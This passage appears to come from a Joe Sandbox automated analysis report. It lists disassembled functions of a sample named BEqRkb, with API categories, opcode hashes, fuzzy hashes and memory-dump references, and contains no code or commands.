                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                        • API String ID: 514040917-4022980321
                                                                                        • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                        • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                                        • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                        • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                                        Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 2057259594-0
                                                                                        • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                        • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                                        • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                        • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                                        Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3103264659-0
                                                                                        • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                        • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                                        • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                        • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                                        Function 00007FFE1A512630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                        • Instruction ID: 0df473ea65eac9d8e5cebb56309f06a445dff3540951c508f90c8b71de79c105
                                                                                        • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                        • Instruction Fuzzy Hash: FB310976709A8186EB608FA1E8407FE7366FB85B94F44407BDA4E47AA4EF38D548C710
                                                                                        Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1269745586-0
                                                                                        • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                        • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                                        • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                        • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                                        Function 00007FFE1A5176E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                        • Instruction ID: 7f00baacd57c16f140912a2b6c9d89bdfa8e4cc5571eb5e97a600a5602932cdc
                                                                                        • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                        • Instruction Fuzzy Hash: A3317336708F8195D760CB65E8406BE33A1FB85BA4F5001B7EA8D43B65EF38C145CB00
                                                                                        Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 1445889803-0
                                                                                        • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                        • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                                        • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                        • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                                        Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                        • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1617791916-0
                                                                                        • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                        • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                                        • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                        • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                                        Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                        • String ID:
                                                                                        • API String ID: 2202868296-0
                                                                                        • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                        • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                                        • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                        • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                                        Function 00007FFE1A520248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                        • String ID:
                                                                                        • API String ID: 15204871-0
                                                                                        • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                        • Instruction ID: 1b2b05230377b3175670e92c5f414f6eb15caa164b20ce4f2f35e47aa6c98fab
                                                                                        • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                        • Instruction Fuzzy Hash: 4BB12873605B89CBEB15CF6AC48636C37A2F745F68F1489A2DA5D837A4CB39D851C700
                                                                                        Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 203985260-0
                                                                                        • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                        • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                                        • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                        • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                                        Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                        • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                                        • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                        • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                                        Function 00007FFE1A51A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                        • Instruction ID: e9e63e4b960bd7cfcb34c2f37e5de1f20d0a3ececb1af84c9e184d25eec958d8
                                                                                        • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                        • Instruction Fuzzy Hash: 9D51F862B0CB8185FB109B73A8405BA7BA2BB41BA4F1441B6EF5C67AA9DF3CD401C700
                                                                                        Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: EntryFunctionLookup
                                                                                        • String ID:
                                                                                        • API String ID: 3852435196-0
                                                                                        • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                        • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                                        • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                        • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                                        Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                        • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                                        • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                        • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                                        Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                        • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                                        • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                        • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                                        Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                        • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                                        • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                        • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                                        Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -
                                                                                        • API String ID: 0-2547889144
                                                                                        • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                        • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                                        • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                        • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                                        Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                        • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                                        • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                        • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                                        Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
